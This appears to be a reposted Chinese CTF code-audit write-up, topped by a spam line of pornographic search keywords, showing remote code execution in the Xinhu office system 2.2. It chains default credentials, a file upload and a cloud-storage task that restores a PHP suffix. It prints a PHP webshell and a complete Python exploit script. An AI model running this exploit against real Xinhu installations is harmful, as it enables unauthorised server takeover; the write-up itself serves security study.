日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > windows >内容正文

windows

[代码审计]信呼协同办公系统2.2存在文件上传配合云处理函数组合拳RCE

發布時間:2023/12/18 windows 37 豆豆
生活随笔 收集整理的這篇文章主要介紹了 [代码审计]信呼协同办公系统2.2存在文件上传配合云处理函数组合拳RCE 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

文章目錄

  • 寫在前面
  • 漏洞分析
  • 腳本

寫在前面

本次強網杯決賽的一個題,還是蠻有意思的,代碼可以在github拿到
https://github.com/rainrocka/xinhu

漏洞分析

首先這個系統存在弱口令,在題目給的sql文件當中通過在線md5破解得到test/abc123

接下來就是隨便找一個地方進行文件上傳

我們抓包看看對這個php文件進行了什么處理,其調用了webmain/task/api/uploadAction.php下uploadClassAction類的upfileAction函數

引入插件,實例化upfileChajian類

跳過不需太過于關注的部分,我們跟蹤up函數

看看issavefile

是一個白名單很明顯php后綴不符合


跳過不相干一堆函數

可以很明顯的發現這類白名單外的文件會被改后綴為uptemp

內容為原來內容的base64編碼結果,猜測估計是為了防止文件包含,不過都到這里了確實有點小單純
接下來就是最關鍵的地方,在webmain\task\runt\qcloudCosAction.php騰訊云存儲下的qcloudCosClassAction的run方法,根據id從數據庫取出數據,接下來看圖

一方面恢復了php后綴,另一方面內容也通過base64還原了
運行下下面的腳本可以看見成功執行whoami

腳本

1.php

<?php eval($_GET["1"]);?>

exp.py

import requestssession = requests.session()url_pre = 'http://url/' url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953' url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913' url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'data1 = {'rempass': '0','jmpass': 'false','device': '1625884034525','ltype': '0','adminuser': 'dGVzdA::','adminpass': 'YWJjMTIz','yanzm': '' }r = session.post(url1, data=data1) r = session.post(url2, files={'file': open('1.php', 'r+')})filepath = str(r.json()['filepath']) filepath = "/" + filepath.split('.uptemp')[0] + '.php' id = r.json()['id']url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'r = session.get(url3) r = session.get(url_pre + filepath + "?1=system('whoami');") print(r.text)

總結

以上是生活随笔為你收集整理的[代码审计]信呼协同办公系统2.2存在文件上传配合云处理函数组合拳RCE的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。